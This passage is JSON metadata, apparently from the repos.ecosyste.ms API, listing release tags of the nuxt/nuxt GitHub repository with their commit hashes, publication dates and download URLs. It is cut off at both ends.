dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G